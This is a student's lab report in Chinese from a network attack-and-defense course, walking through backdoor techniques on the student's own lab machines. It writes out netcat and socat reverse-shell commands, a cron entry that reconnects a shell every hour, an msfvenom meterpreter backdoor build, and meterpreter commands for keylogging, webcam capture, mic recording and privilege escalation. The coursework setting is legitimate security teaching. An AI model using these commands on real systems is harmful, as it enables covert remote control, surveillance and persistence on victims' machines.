1. 程式人生 > >2017-2018-2 20155231《網絡對抗技術》實驗二:後門原理與實踐

2017-2018-2 20155231《網絡對抗技術》實驗二:後門原理與實踐

虛擬機ip src oca ali 執行 -m 定時 port art

2017-2018-2 20155231《網絡對抗技術》實驗二:後門原理與實踐

常用後門工具

一、Windows獲得Linux的Shell

在本機cmd中使用ipconfig獲得windows的IP地址

技術分享圖片

1.windows 打開監聽

技術分享圖片

2.Linux反彈連接win
nc(主機ip) 5231(所設置的端口) -e /bin/sh

3.windows下獲得一個linux shell,可運行任何指令,如ls

技術分享圖片

二、Linux獲得Win Shell

ifconfig獲得虛擬機IP
技術分享圖片

1.Linux運行監聽指令

使用指令,nc -l -p 5231,監聽5231端口

2.Windows反彈連接Linux

技術分享圖片

3.Linux下看到Windows的命令提示

技術分享圖片

三、使用nc傳輸數據

1.Windows下監聽5231端口:
技術分享圖片

2.Kali下連接到Windows的5231端口:

技術分享圖片

3.建立連接之後,就可以傳輸數據了:

技術分享圖片

實驗內容

一、使用netcat獲取主機操作Shell,cron啟動

先在Windows系統下,用ncat.exe -l -p 5231,監聽端口

技術分享圖片

crontab -e指令編輯一條定時任務
技術分享圖片

在最後一行加入53* * * * /bin/netcat 10.1.1.141 5236 -e /bin/sh,意思是在每個小時的第53分鐘(為測試結果方便所選時間最好離現實時間較近)反向連接Windows主機的5231端口,就會啟動cron

技術分享圖片

到時間後,便獲得了Kali的shell,可以輸入指令
技術分享圖片

二、使用socat獲取主機操作Shell, 任務計劃啟動

在Windows系統下,打開控制面板->管理工具->任務計劃程序(可在控制面板直接搜索任務計劃),創建任務,填寫任務名稱後,新建一個觸發器

在操作->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5231 exec:cmd.exe,pty,stderr,這個命令的作用是把cmd.exe綁定到端口5231,同時把cmd.exe的stderr重定向到stdout上:

技術分享圖片

創建完成之後,選擇運行
技術分享圖片

然後在Kali環境下輸入指令socat - tcp:IP(目標主機):5231,這裏的第一個參數-代表標準的輸入輸出,第二個流連接到Windows主機的5231端口,此時可以發現已經成功獲得了一個cmd shell

技術分享圖片

三、使用MSF meterpreter(或其他軟件)生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

輸入msfvenom -p windows/meterpreter/reverse_tcp LHOST=虛擬機IP LPORT=5231 -f exe > 20155231_backdoor.exe生成後門程序

技術分享圖片

然後通過nc指令將生成的後門程序傳送到Windows主機上
windows:ncat.exe -l 5231 > 20155231_backdoor.exe

技術分享圖片

kali:nc IP(win) 5231 < 20155231.exe

技術分享圖片

在Kali上使用msfconsole指令進入msf控制臺,

技術分享圖片

設置完成後,利用exploit,執行監聽

在windows中,運行20155231_backdoor.exe

技術分享圖片

此時Kali上已經獲得了Windows主機的連接,並且得到了遠程控制的shell

技術分享圖片

四、使用MSF meterpreter(或其他軟件)生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

  • 使用record_mic指令可以截獲一段音頻

技術分享圖片

  • 使用webcam_snap指令可以使用攝像頭進行拍照
  • 使用webcam stream指令可以使用攝像頭進行錄像
  • 使用screenshot指令可以進行截屏
    技術分享圖片

  • 使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄
  • 先使用getuid指令查看當前用戶,使用getsystem指令進行提權
    技術分享圖片

基礎問題回答

(1)例舉你能想到的一個後門進入到你系統中的可能方式?

  • 下載安裝軟件

(2)例舉你知道的後門如何啟動起來(win及linux)的方式?

  • 直接啟動,定時啟動。

(3)Meterpreter有哪些給你映像深刻的功能?

  • 更改獲得權限,打開目標主機攝像頭等控件

(4)如何發現自己有系統有沒有被安裝後門?

  • 殺毒軟件,監控程序運行

實驗總結與體會

本次實驗,由於虛擬機網絡連接經常出現問題,借用了同學的虛擬機做實驗。學習使用了nc等後門工具。完成了使用MSF截屏、錄音等操作,提權失敗。

2017-2018-2 20155231《網絡對抗技術》實驗二:後門原理與實踐